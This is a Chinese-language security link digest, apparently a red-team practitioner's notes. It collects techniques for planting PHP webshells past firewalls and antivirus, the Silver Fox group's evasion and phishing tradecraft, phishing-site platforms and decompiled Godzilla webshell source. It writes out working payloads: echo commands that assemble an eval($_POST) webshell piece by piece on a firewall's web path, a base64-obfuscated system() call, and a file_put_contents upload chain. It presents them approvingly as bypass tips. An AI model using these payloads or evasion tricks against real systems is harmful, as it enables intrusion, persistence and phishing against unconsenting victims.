Quan


WEB安全 内网安全 终端对抗 威胁情报 搜索内容
WEB安全
免杀的PHP Webshell
看着要上传三个文件才能免杀,好处是最终连接的是哥斯拉的webshell。具体原理实现还没分析

https://mp.weixin.qq.com/s?__biz=MzU3NzY3MzYzMw==&mid=2247497243&idx=1&sn=69d9ef08a5d98c17459955c96e624dad
WEB安全
高限制下的Webshell写入Tips
来自华顺信安的一篇文章,绕过某下一代防火墙做的操作,其中提到的限制如下:
1. 无法注入分号截断命令
2. 无法使用 `|| &&` 等特殊符号
3. 想要通过  echo 写入文件时,`>>` 追加写入的方式,不可以,`> `会被截断
4. 较长的 PHP 代码部分,都无法被传入,无法正常解析,需要分段截取写入
5. 传入命令时,需要对特殊字符进行 url 编码
那么如何绕过>>追加写入方式被截断这件事呢,给出了这样的payload
echo -e -n \"<?php \" > /fwlib/sys/virus/webui/svpn_html/1.txt

echo -e -n \"eval\" > /fwlib/sys/virus/webui/svpn_html/2.txt

echo -e -n '($_POST[\"pass' > /fwlib/sys/virus/webui/svpn_html/3.txt

echo -e -n '\"])' > /fwlib/sys/virus/webui/svpn_html/4.txt

echo -e -n \" ?>\" > /fwlib/sys/virus/webui/svpn_html/5.txt

cat /fwlib/sys/virus/webui/svpn_html/1.txt /fwlib/sys/virus/webui/svpn_html/2.txt /fwlib/sys/virus/webui/svpn_html/3.txt /fwlib/sys/virus/webui/svpn_html/4.txt /fwlib/sys/virus/webui/svpn_html/5.txt> /fwlib/sys/virus/webui/svpn_html/xxx.php
确实厉害啊...这个我没能想到
其次对于这个初始化的Webshell在流量侧并不能通过,于是给出了几个解决方案
echo system($_POST[1]("cHdk"));&1=base64_decode
还提到,如果有+号,需要URL编码一下,如果以=或者==结尾,那么就要在等于符号后面再加一个空格,不会存在解析问题,而且还能绕过,很好的Tips
Webshell连接
pass= $_POST[1]($_POST[2],$_POST[3]($_POST[4]));&1=file_put_contents&2=webshell名称.php&3=base64_decode&4=<webshell内容>
这里有个细节:在pass=后面是有一个空格存在的,原因原文有说

https://mp.weixin.qq.com/s?__biz=MzI4MzcwNTAzOQ==&mid=2247535253&idx=1&sn=a63da635da47e36d7a285a69fff6f365
终端对抗
银狐样本中使用到的一些手法
1.将exe后缀命名为c后缀
在文件落盘时,终端杀软的实时防护功能会对落盘文件进行扫描。但杀软通常会略过某些类型的文件(不扫描),以降低对终端性能的占用。这之中,C语言源代码文件就是不会被传统杀软扫描的文件类型之一。银狐通过将样本执行文件伪装成C语言文件,绕过了杀软扫描。

2.利用云存储来部署HTML页面
在历史活动中,攻击者总是会将钓鱼页面部署在个人服务器上,然后通过传播恶意链接将受害者引导到这些页面。这种方式容易被网络安全系统检测到。然而,最新的变化是“银狐”团伙直接将钓鱼HTML页面存放在云存储桶中,使得受害者更难以分辨恶意链接,绕过了传统的网络检测手段,减少了被检测到的风险。此外,他们还能够更快速地部署和更换恶意页面,增加了灵活性的同时还进一步降低攻击成本。

3.利用QQ邮箱中转站|金山文档存储文件
将恶意文件储存于类似“QQ邮箱中转站”、“金山文档”而不是私人文件服务器。
这个缺失从来没关注过

4.云盘托管恶意文件
利用zoho企业网盘奶牛快传123云盘直链下发文件。其特点是隐蔽性和变化快,即使某些URL地址被封锁,攻击者仍能轻松更换存储位置,继续攻击。而不必担心服务器维护或被追踪。攻击者的快速部署和传播恶意文件的能力增加了攻击的复杂性。

5.利用chm来完成攻击
黑客利用开源工具“DotNetToJScript”将C#恶意加载器转成相应js脚本嵌入chm文件中执行。
双击压缩包中包含的CHM文件后,利用反序列化加载执行.NET程序,还会检测计算机上是否安装了.NET Framework,并根据检测结果设置相关的环境变量,从而执行不同的代码段。

https://mp.weixin.qq.com/s/_BGufWpQcgMUtrYXy5c-Bw
WEB安全
收集两个用于快速搭建钓鱼网站的平台
这个还在更新,并且内置模板,还没有仔细研究goblin
这个是两年前的项目,没有更新了Pricking 

https://www.redteam.wang
WEB安全
哥斯拉4.0.1反编译源码
学哥斯拉的一些东西的时候经常会找一个不错的反编译源码,这个很不错

https://github.com/DeEpinGh0st/GodzillaSource